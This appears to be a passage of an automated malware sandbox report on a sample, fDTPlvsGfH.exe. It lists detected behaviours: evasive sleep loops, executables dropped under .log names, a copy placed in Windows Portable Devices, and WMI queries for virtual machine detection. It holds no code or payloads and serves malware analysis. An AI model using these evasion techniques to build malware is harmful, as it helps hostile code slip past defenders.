Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572953
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572841
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572734
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1889 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1979 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2448 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2065 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2652
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window / User API: threadDelayed 5162
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window / User API: threadDelayed 4168
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eFdBcvYu.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KySWwqSG.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iDXAsssK.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UnQDGoMO.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wiMZKnmL.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DSloixRU.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bXqTeyrX.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aOmKVzXA.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\owAZVXxy.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hMaKxNSp.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nnwRMYdb.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XgzcXCre.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HFjxfdnr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NyMWIIsf.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fTLbMRgr.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JCfvgtvD.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AZWFwAgV.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uodzyDCn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hPTsHewM.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CVKgMxCZ.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jsvAFsni.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DYQGISGu.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OvoeeIHa.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lCRBFKSi.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RoXDuWmq.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AhGYbjHb.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ssViDqmS.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AHvxDOtC.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hGwsXsdP.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dZcBAhwS.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TlyLQWBk.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OygMnZlw.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WjYUBCcj.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zZCPRjnE.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TcbLgjio.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rqDqMXbo.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ajmLslvZ.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wlEHTDRh.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ICLFBdCl.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rhfqclHr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qZchTloU.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uuIRZZqN.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YVXcjCmC.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wacGgDMF.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lFJjObwF.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WKOtegOK.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GOHxPPGn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LvueRqhB.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\luhiabrd.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CKigYxxx.log Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 1889 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276 Thread sleep count: 1979 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 2448 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep count: 2065 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep count: 2652 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 94 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 7748 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599871s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599765s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599655s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598696s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8040 Thread sleep time: -43200000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598586s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598125s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -597500s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -596828s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -596344s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595891s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594781s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594516s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594234s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593516s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591781s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590640s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590422s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -589562s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -589109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -588719s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -588266s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -587750s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -587250s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -586672s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -586250s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585922s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585469s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585062s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -584547s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -584171s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583969s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583772s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583564s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583231s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583050s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582703s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582536s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582380s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8040 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -580047s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579762s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579547s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579344s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579156s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578969s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578810s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578609s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578226s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578085s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577937s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577734s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577566s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577219s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577031s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576797s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576594s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576404s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576219s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575968s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575828s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575656s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575223s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574984s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574866s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574731s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574622s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574514s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574297s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574187s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574077s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573954s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573810s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573683s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573531s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573418s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573299s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573062s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572953s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572841s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572734s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8BEC5A GetSystemInfo, 0_2_00007FFD9B8BEC5A
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
